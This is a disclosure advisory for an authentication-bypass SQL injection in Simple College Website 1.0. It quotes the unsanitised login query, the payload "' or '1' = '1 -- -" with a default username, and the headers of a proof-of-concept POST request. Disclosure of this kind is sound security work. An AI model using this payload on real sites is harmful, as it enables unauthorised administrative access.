Simple College Website 1.0 SQL Injection

Simple College Website version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass. Original discovery of SQL injection in this version is attributed to yunaranyancat in October of 2020.

MD5 | 027ad1acbd37ef2d9dd3fb01b5fc4e7a

# Exploit Title: Simple College Website 1.0 - 'name' Sql Injection (Authentication Bypass)
# Exploit Author: Marco Catalano (@stunn4)
# Date: 2021-01-25
# Vendor Homepage:
# Software Link:
# Affected Version: 1.0
# Vulnerable parameter: "name" (POST method)
# Tested on: Linux, PHP/7.4.11

The source of "/admin_pages/login.php" file defines the following lines of code:

$result=mysqli_query($conn,"SELECT * FROM users WHERE name='$name' AND Password='$password'");

which are called when trying to log into the administrative panel at "/admin_pages/login.php" itself.

Proof Of Concept:

The user input is not properly sanitized and this leads to authentication bypass through the classic "<username>' or '1' = '1 -- -" where <username> has to be a valid username. For example, the default username is "florian".

POST /admin_pages/login.php HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 66
Connection: close
Cookie: wp-settings-time-1=1611158502; PHPSESSID=ujhslpm8cg18eeb1jd7nempudj
Upgrade-Insecure-Requests: 1


Related Posts